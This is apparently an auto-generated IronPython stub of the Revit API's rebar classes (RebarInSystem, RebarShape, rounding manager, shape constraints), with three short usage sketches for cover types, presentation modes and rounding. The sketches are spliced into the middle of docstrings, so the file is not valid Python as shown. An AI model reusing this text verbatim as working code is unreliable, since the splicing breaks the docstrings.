__repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarHostData) -> bool """ class RebarInSystem(Element, IDisposable): """ Represents a rebar element that is part of a system. """ def CanApplyPresentationMode(self, dBView): """ CanApplyPresentationMode(self: RebarInSystem, dBView: View) -> bool Checks if a presentation mode can be applied for this rebar in the given view. dBView: The view in which presentation mode will be applied. Returns: True if a presentation mode can be applied for the given view, false otherwise. """ pass def ClearPresentationMode(self, dBView): """ ClearPresentationMode(self: RebarInSystem, dBView: View) Sets the presentation mode for this rebar set to the default (either for a single view, or for all views). dBView: The view where the presentation mode will be cleared. NULL for all views """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def DoesBarExistAtPosition(self, barPosition): """ DoesBarExistAtPosition(self: RebarInSystem, barPosition: int) -> bool Checks whether a bar exists at the specified position. barPosition: A bar position index between 0 and NumberOfBarPositions-1. 
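# Usage sketch: defining a clear-cover value and applying it to a rebar host.
# Assumes `doc` is the active Document and `host` is a concrete element (wall,
# floor, column, ...) obtained elsewhere; cover distances are in feet.
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import Transaction
from Autodesk.Revit.DB.Structure import RebarCoverType, RebarHostData

if RebarHostData.IsValidHost(host):                       # static overload: can this element host rebar?
    host_data = RebarHostData.GetRebarHostData(host)
    t = Transaction(doc, 'Apply rebar cover')
    t.Start()
    cover = RebarCoverType.Create(doc, 'Cover 50 mm', 50.0 / 304.8)  # mm -> feet
    host_data.SetCommonCoverType(cover)                    # one cover for every exposed face
    t.Commit()
    for face in host_data.GetExposedFaces():               # faces that carry a CoverType
        print(host_data.GetCoverType(face).Name)
    print(len(host_data.GetRebarsInHost()))                # Rebar elements already hosted here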
Returns: Always returns true, since it is not possible to de-activate the first or last bars in a Rebar set that is part of Area or Path Reinforcement. (see includeFirstBar and includeLastBar methods for Rebar) """ pass def FindMatchingPredefinedPresentationMode(self, dBView): """ FindMatchingPredefinedPresentationMode(self: RebarInSystem, dBView: View) -> RebarPresentationMode Determines if there is a matching RebarPresentationMode for the current set of selected hidden and unhidden bars assigned to the given view. dBView: The view. Returns: The presentation mode that matches the current set of selected hidden and unhidden bars. If there is no better match, this returns RebarPresentationMode.Select. """ pass def GetBarPositionTransform(self, barPositionIndex): """ GetBarPositionTransform(self: RebarInSystem, barPositionIndex: int) -> Transform Return a transform representing the relative position of any individual bar in the set. barPositionIndex: An index between 0 and (NumberOfBarPositions-1). Returns: The position of a bar in the set relative to the first position. """ pass def GetBendData(self): """ GetBendData(self: RebarInSystem) -> RebarBendData Gets the RebarBendData, containing bar and hook information, of the instance. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCenterlineCurves(self, adjustForSelfIntersection, suppressHooks, suppressBendRadius): """ GetCenterlineCurves(self: RebarInSystem, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. """ pass def GetDistributionPath(self): """ GetDistributionPath(self: RebarInSystem) -> Line The distribution path of a rebar set. Returns: A line beginning at (0, 0, 0) and representing the direction and length of the set. """ pass def GetHookTypeId(self, end): """ GetHookTypeId(self: RebarInSystem, end: int) -> ElementId Get the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. Returns: The id of a RebarHookType, or invalidElementId if the rebar has no hook at the specified end. """ pass def GetHostId(self): """ GetHostId(self: RebarInSystem) -> ElementId The element that contains the rebar. Returns: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. """ pass def GetPresentationMode(self, dBView): """ GetPresentationMode(self: RebarInSystem, dBView: View) -> RebarPresentationMode Gets the presentaion mode for this rebar set when displayed in the given view. dBView: The view. Returns: The presentation mode. """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: RebarInSystem) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. 
""" pass def HasPresentationOverrides(self, dBView): """ HasPresentationOverrides(self: RebarInSystem, dBView: View) -> bool Identifies if this RebarInSystem has overridden default presentation settings for the given view. dBView: The view. Returns: True if this RebarInSystem has overriden default presentation settings, false otherwise. """ pass def IsBarHidden(self, view, barIndex): """ IsBarHidden(self: RebarInSystem, view: View, barIndex: int) -> bool Identifies if a given bar in this rebar set is hidden in this view. view: The view. barIndex: The index of the bar from this rebar set. Returns: True if the bar is hidden in this view, false otherwise. """ pass def IsRebarInSection(self, dBView): """ IsRebarInSection(self: RebarInSystem, dBView: View) -> bool Identifies if this RebarInSystem is shown as a cross-section in the given view. dBView: The view. Returns: True if this RebarInSystem is shown as a cross-section, false otherwise. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: RebarInSystem, view: View3D) -> bool Checks if this rebar element is shown solidly in a 3D view. view: The 3D view element Returns: True if rebar is shown solidly, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: RebarInSystem, view: View) -> bool Checks if this rebar element is shown unobscured in a view. view: The view element Returns: True if rebar is shown unobscured, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetBarHiddenStatus(self, view, barIndex, hide): """ SetBarHiddenStatus(self: RebarInSystem, view: View, barIndex: int, hide: bool) Sets the bar in this rebar set to be hidden or unhidden in the given view. view: The view. barIndex: The index of the bar from this set. hide: True to hide this bar in the view, false to unhide the bar. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetPresentationMode(self, dBView, presentationMode): """ SetPresentationMode(self: RebarInSystem, dBView: View, presentationMode: RebarPresentationMode) Sets the presentation mode for this rebar set when displayed in the given view. dBView: The view. presentationMode: The presentation mode. """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: RebarInSystem, view: View3D, solid: bool) Sets this rebar element to be shown solidly in a 3D view. view: The 3D view element solid: True if rebar element is shown solidly, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: RebarInSystem, view: View, unobscured: bool) Sets RebarInSystem element to be shown unobscured in a view. view: The view element unobscured: True if RebarInSystem element is shown unobscured, false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass ArrayLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the distribution path length of rebar set. Get: ArrayLength(self: RebarInSystem) -> float """ BarsOnNormalSide = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if the bars of the rebar set are on the same side of the rebar plane indicated by the normal. For the current implementation of RebarInSystem, this property will always return true, but it is included in the RebarInSystem interface for consistency with the Rebar class. Get: BarsOnNormalSide(self: RebarInSystem) -> bool """ LayoutRule = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the layout rule of rebar set. Get: LayoutRule(self: RebarInSystem) -> RebarLayoutRule """ MaxSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the maximum spacing between rebar in rebar set. Get: MaxSpacing(self: RebarInSystem) -> float """ Normal = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A unit-length vector normal to the plane of the rebar Get: Normal(self: RebarInSystem) -> XYZ """ NumberOfBarPositions = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of bar positions available in the rebar. Get: NumberOfBarPositions(self: RebarInSystem) -> int """ Quantity = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the number of bars in rebar set. For the current implementation of RebarInSystem, this property will always return the same number as NumberOfBarPositions, since the first and last bars of a RebarInSystem set cannot be suppressed. However, it is included in the RebarInSystem interface for consistency with the Rebar class. Get: Quantity(self: RebarInSystem) -> int """ RebarShapeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The RebarShape element that defines the shape of the rebar. Get: RebarShapeId(self: RebarInSystem) -> ElementId """ ScheduleMark = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Schedule Mark parameter. On creation, the Schedule Mark is set to a value that is unique to the host, but it can be set to any value. Get: ScheduleMark(self: RebarInSystem) -> str Set: ScheduleMark(self: RebarInSystem) = value """ SystemId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Id of an AreaReinforcement or PathReinforcement element that owns this element. Get: SystemId(self: RebarInSystem) -> ElementId """ TotalLength = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The length of an individual bar multiplied by Quantity. Get: TotalLength(self: RebarInSystem) -> float """ Volume = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The volume of an individual bar multiplied by Quantity. 
Get: Volume(self: RebarInSystem) -> float """ class RebarLayoutRule(Enum, IComparable, IFormattable, IConvertible): """ The rule for how the rebars in rebar set are laid out enum RebarLayoutRule, values: FixedNumber (1), MaximumSpacing (2), MinimumClearSpacing (4), NumberWithSpacing (3), Single (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass FixedNumber = None MaximumSpacing = None MinimumClearSpacing = None NumberWithSpacing = None Single = None value__ = None class RebarPresentationMode(Enum, IComparable, IFormattable, IConvertible): """ Bar presentation mode enum RebarPresentationMode, values: All (0), FirstLast (1), Middle (2), Select (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass All = None FirstLast = None Middle = None Select = None value__ = None class ReinforcementData(object, IDisposable): """ Abstract class for various reinforcement data """ def Dispose(self): """ Dispose(self: ReinforcementData) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
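# Usage sketch: inspecting RebarInSystem elements (bars owned by an area or path
# reinforcement) and switching their presentation in a view. Assumes `doc` is the
# active Document and `view` is the View to modify; the elements are gathered with
# a FilteredElementCollector.
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import FilteredElementCollector, Transaction
from Autodesk.Revit.DB.Structure import RebarInSystem, RebarPresentationMode

bars = FilteredElementCollector(doc).OfClass(RebarInSystem).ToElements()
t = Transaction(doc, 'Show first and last bars only')
t.Start()
for bar in bars:
    print(bar.SystemId, bar.Quantity, bar.TotalLength)      # owning system and basic quantities
    curves = bar.GetCenterlineCurves(False, False, False)   # full centerline, hooks and fillets included
    print(len(curves), 'centerline curves')
    if bar.CanApplyPresentationMode(view):
        bar.SetPresentationMode(view, RebarPresentationMode.FirstLast)
t.Commit()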
initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: ReinforcementData) -> bool """ class RebarReinforcementData(ReinforcementData, IDisposable): """ A class containing the id and the end of the rebar on which the coupler stays """ @staticmethod def Create(rebarId, iEnd): """ Create(rebarId: ElementId, iEnd: int) -> RebarReinforcementData Creates a new instance of RebarReinforcementData, or null if the operation fails. rebarId: the Id of the rebar iEnd: The end of rebar where the coupler stays. This should be 0 or 1 Returns: The newly created instance of RebarReinforcementData """ pass def Dispose(self): """ Dispose(self: ReinforcementData, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass End = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The end of the rebar. The end should be 0 or 1. Get: End(self: RebarReinforcementData) -> int Set: End(self: RebarReinforcementData) = value """ RebarId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the Rebar Get: RebarId(self: RebarReinforcementData) -> ElementId Set: RebarId(self: RebarReinforcementData) = value """ class RebarRoundingManager(ReinforcementRoundingManager, IDisposable): """ Provides access to element reinforcement rounding overrides. """ def Dispose(self): """ Dispose(self: ReinforcementRoundingManager, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementRoundingManager, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ApplicableReinforcementRoundingSource = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the source of the rounding settings for this element. Get: ApplicableReinforcementRoundingSource(self: RebarRoundingManager) -> ReinforcementRoundingSource """ ApplicableSegmentLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding for shared parameters used by rebar. 
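# Usage sketch: reading and overriding reinforcement rounding for one rebar set.
# Assumes `doc` is the active Document and `rebar` is a Rebar or RebarInSystem
# element obtained elsewhere; rounding values are in Revit internal units (feet).
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import Transaction

rounding = rebar.GetReinforcementRoundingManager()
print(rounding.ApplicableReinforcementRoundingSource)       # where the active settings come from
print(rounding.ApplicableTotalLengthRounding)               # effective Bar Length / Total Bar Length rounding
t = Transaction(doc, 'Round total bar length to 25 mm')
t.Start()
rounding.TotalLengthRounding = 25.0 / 304.8                 # element-level override, mm -> feet
t.Commit()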
Get: ApplicableSegmentLengthRounding(self: RebarRoundingManager) -> float """ ApplicableSegmentLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding method for shared parameters used by rebar. Get: ApplicableSegmentLengthRoundingMethod(self: RebarRoundingManager) -> RoundingMethod """ ApplicableTotalLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding for Bar Length and Total Bar Length parameters. Get: ApplicableTotalLengthRounding(self: RebarRoundingManager) -> float """ ApplicableTotalLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The applicable rounding method for Bar Length and Total Bar Length parameters. Get: ApplicableTotalLengthRoundingMethod(self: RebarRoundingManager) -> RoundingMethod """ SegmentLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rounding for shared parameters used by rebar. Get: SegmentLengthRounding(self: RebarRoundingManager) -> float Set: SegmentLengthRounding(self: RebarRoundingManager) = value """ SegmentLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the segment length rounding method Get: SegmentLengthRoundingMethod(self: RebarRoundingManager) -> RoundingMethod Set: SegmentLengthRoundingMethod(self: RebarRoundingManager) = value """ TotalLengthRounding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The rounding for Bar Length and Total Bar Length parameters. Get: TotalLengthRounding(self: RebarRoundingManager) -> float Set: TotalLengthRounding(self: RebarRoundingManager) = value """ TotalLengthRoundingMethod = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies the total length rounding method Get: TotalLengthRoundingMethod(self: RebarRoundingManager) -> RoundingMethod Set: TotalLengthRoundingMethod(self: RebarRoundingManager) = value """ class RebarShape(ElementType, IDisposable): """ RebarShape specifies the shape type for a Rebar instance. """ @staticmethod def Create(doc, definition, multiplanarDefinition, style, attachmentType, startHookAngle, startHookOrientation, endHookAngle, endHookOrientation, higherEnd): """ Create(doc: Document, definition: RebarShapeDefinition, multiplanarDefinition: RebarShapeMultiplanarDefinition, style: RebarStyle, attachmentType: StirrupTieAttachmentType, startHookAngle: int, startHookOrientation: RebarHookOrientation, endHookAngle: int, endHookOrientation: RebarHookOrientation, higherEnd: int) -> RebarShape Create a new instance of a Rebar Shape, which defines the shape of a rebar. doc: A document to contain the RebarShape. definition: The definition of the rebar shape, as a set of curves in a plane driven by parameters. multiplanarDefinition: If not null, the created RebarShape will be a 3D shape. The shape is built out of the planar RebarShapeDefinition, with additional out-of-plane segments defined by the RebarShapeMultiplanarDefinition object. Not supported in conjunction with RebarShapeDefinitionByArc of type Spiral or LappedCircle. style: Whether the shape is to be used as a standard bar or a stirrup/tie. 
attachmentType: When the style is stirrup/tie, specify whether it will attach to the interior of cover (cover is measured to the stirrups), or to the exterior of cover (cover is measured to the standard bars). Ignored when the style is Standard. startHookAngle: The start hook angle, expressed as an integral number of degrees. If 0, the shape will have no start hook. Common values are 0, 90, 135, and 180. startHookOrientation: The orientation of the start hook. Ignored when startHookAngle is 0. endHookAngle: The end hook angle, expressed as an integral number of degrees. If 0, the shape will have no end hook. Common values are 0, 90, 135, and 180. endHookOrientation: The orientation of the end hook. Ignored when endHookAngle is 0. higherEnd: When the rebar crosses itself, one end will be "lifted" to avoid self-intersection. Specify which end should be lifted: 0 for start, 1 for end. Returns: A new RebarShape instance. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def GetAllowed(self, barType): """ GetAllowed(self: RebarShape, barType: RebarBarType) -> bool Check whether a bar type can be used with this RebarShape. Bar types are allowed by default. barType: A bar type in the same document as this shape. Returns: True if this shape may be combined with this barType. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetCurvesForBrowser(self): """ GetCurvesForBrowser(self: RebarShape) -> IList[Curve] Generate curves for the shape, as used in the shape browser. Returns: An array of curves representing the shape with its default parameters. """ pass def GetDefaultHookAngle(self, index): """ GetDefaultHookAngle(self: RebarShape, index: int) -> int Get the hook angle, expressed as an integral number of degrees (common values are 0, 90, 135, and 180). index: 0 for the starting hook, 1 for the ending hook. """ pass def GetDefaultHookOrientation(self, index): """ GetDefaultHookOrientation(self: RebarShape, index: int) -> RebarHookOrientation Get the hook orientation. index: 0 for the starting hook, 1 for the ending hook. """ pass def GetEndTreatmentTypeId(self, iEnd): """ GetEndTreatmentTypeId(self: RebarShape, iEnd: int) -> ElementId get the id of the end treatment for the designated shape end """ pass def GetMultiplanarDefinition(self): """ GetMultiplanarDefinition(self: RebarShape) -> RebarShapeMultiplanarDefinition The optional 3D structure of the shape. Returns: A copy of the multiplanar definition. Changes will not affect the RebarShape. """ pass def GetRebarShapeDefinition(self): """ GetRebarShapeDefinition(self: RebarShape) -> RebarShapeDefinition Return the definition of the RebarShape. Returns: A copy of the definition. Changes will not affect the RebarShape. """ pass def HasEndTreatment(self): """ HasEndTreatment(self: RebarShape) -> bool returns true if the shape has end treatment for at least one end. """ pass def IsSameShapeIgnoringHooks(self, otherShape): """ IsSameShapeIgnoringHooks(self: RebarShape, otherShape: RebarShape) -> bool Test whether two shapes have equivalent definitions by comparing the RebarShapeDefinition and MultiplanarDefinition properties. otherShape: Another shape to be compared to this one. Returns: True if the shape definitions match, false otherwise. 
""" pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def SetAllowed(self, barType, allowed): """ SetAllowed(self: RebarShape, barType: RebarBarType, allowed: bool) Specify which bar types can be used with this RebarShape. Bar types are allowed by default. barType: A bar type in the same document as this shape. allowed: Whether this shape may be combined with barType. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetEndTreatmentTypeId(self, treatmenetId, iEnd): """ SetEndTreatmentTypeId(self: RebarShape, treatmenetId: ElementId, iEnd: int) set the end treatment type id for the designated shape end """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass HigherEnd = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Defines the higher end of rebar shape. Get: HigherEnd(self: RebarShape) -> int """ RebarStyle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether the shape represents a standard bar or a stirrup. Get: RebarStyle(self: RebarShape) -> RebarStyle """ ShapeFamilyId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Get and return the rebar shape family id. Get: ShapeFamilyId(self: RebarShape) -> ElementId """ SimpleArc = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Check whether this shape consists of a single arc, possibly with hooks. Get: SimpleArc(self: RebarShape) -> bool """ SimpleLine = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Check whether this shape consists of a single straight segment, possibly with hooks. Get: SimpleLine(self: RebarShape) -> bool """ StirrupTieAttachment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The attachment type of stirrup ties and rebars. Get: StirrupTieAttachment(self: RebarShape) -> StirrupTieAttachmentType """ class RebarShapeArcReferenceType(Enum, IComparable, IFormattable, IConvertible): """ A Rebar Shape Definition constraint that is measured to a bend must take the bar diameter into account by specifying whether it measures to the exterior, centerline, or interior of the bend. enum RebarShapeArcReferenceType, values: Centerline (0), External (1), Internal (-1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Centerline = None External = None Internal = None value__ = None class RebarShapeBendAngle(Enum, IComparable, IFormattable, IConvertible): """ A bend in a rebar shape has an angular range specified by one of these values. The angles refer to the angle swept out by one segment as it is bent relative to another. That is, an "Obtuse" bend results in two segments that meet at an angle that is less than 90 degrees when measured internally. Put another way, to create an equilateral triangle, you would need two "Obtuse" bends. enum RebarShapeBendAngle, values: Acute (1), Obtuse (3), Right (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Acute = None Obtuse = None Right = None value__ = None class RebarShapeConstraint(object, IDisposable): """ A dimension or other constraint that takes part in a RebarShapeDefinition. """ def Dispose(self): """ Dispose(self: RebarShapeConstraint) """ pass def GetParamId(self): """ GetParamId(self: RebarShapeConstraint) -> ElementId Return the Id of the parameter associated with this constraint. Returns: The Id of the parameter, or InvalidElementId if the constraint does not have one. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeConstraint) -> bool """ class RebarShapeConstraint180DegreeBendArcLength(RebarShapeConstraint, IDisposable): """ A constraint which can be applied to a RebarShapeSegment, and causes the segment to be replaced with a 180-degree arc. 
The associated parameter drives the arc length. RebarShapeConstraint180DegreeBendArcLength(paramId: ElementId) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId): """ __new__(cls: type, paramId: ElementId) """ pass class RebarShapeConstraint180DegreeBendRadius(RebarShapeConstraint, IDisposable): """ A constraint which can be applied to a RebarShapeSegment, and causes the segment to be replaced with a 180-degree arc. The associated parameter drives the radius of the arc. RebarShapeConstraint180DegreeBendRadius(paramId: ElementId, refType: RebarShapeArcReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType): """ __new__(cls: type, paramId: ElementId, refType: RebarShapeArcReferenceType) """ pass ArcReferenceType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A choice of rule for measuring the radius. Get: ArcReferenceType(self: RebarShapeConstraint180DegreeBendRadius) -> RebarShapeArcReferenceType """ class RebarShapeConstraint180DegreeDefaultBend(RebarShapeConstraint, IDisposable): """ A constraint which can be applied to a RebarShapeSegment, and causes the segment to be replaced with a 180-degree arc. The arc's radius is not specified by the shape; instead it is a "default bend radius," taken from the RebarBarType associated with the Rebar instance. RebarShapeConstraint180DegreeDefaultBend() """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ 